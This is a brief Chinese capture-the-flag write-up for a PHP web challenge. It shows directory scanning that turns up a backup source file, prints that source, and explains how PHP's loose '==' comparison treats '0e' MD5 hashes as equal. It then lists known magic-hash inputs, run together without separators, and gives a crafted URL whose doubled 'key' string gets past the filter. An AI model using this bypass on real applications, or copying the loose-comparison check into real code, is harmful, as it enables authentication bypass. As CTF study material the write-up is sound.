访问页面得到字符串
这串字符串是重复的; d41d8cd98f00b204e9800998ecf8427e
从前端、源码上看,除了这段字符串,没有其他信息;尝试解密,长度32位;各种解密方式试试;
MD5免费在线解密破解_MD5在线加密-SOMD5
解密后是空字符串;没有有用信息;
查看后端:
使用dirsearch 扫描后端服务;
查到一个 index.php.bak 文件 ,代码如下:(注释我自己补上的)
<?php
/*** Created by PhpStorm.* User: Norse* Date: 2017/8/6* Time: 20:22
*/include_once "flag.php";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'], '?'); //php strstr() 函数搜索一个字符串在另一个字符串中是否存在,如果是,返回该字符串及后面剩余部分;
$str = substr($str,1); // 返回第一个字符后面的字符; 相当于把 ? 删除;
$str = str_replace('key','',$str); // 把 key 替换成空格
parse_str($str); //把查询字符串解析到变量中:让 key1 = xx ,key2 = yy;
echo md5($key1); //key1 回显echo md5($key2); //key2 回显
if(md5($key1) == md5($key2) && $key1 !== $key2){ //比较,若key1 和key2的md5值相等,且key1、key2 不等;得到flayecho $flag."取得flag";
}
?>
所以根据代码逆向构造,并且这里使用了一个php 的bug
PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。
常见payload有:
QNKCDZO240610708s878926199as155964671as214587387as214587387a
所以:构造参数
http://114.67.175.224:13384/?kkeyey1=240610708&kkeyey2=QNKCDZO
得到flag
参考文档:
PHP strstr() 函数 | 菜鸟教程 (runoob.com)
PHP 函数漏洞总结 - zw1sh - 博客园 (cnblogs.com)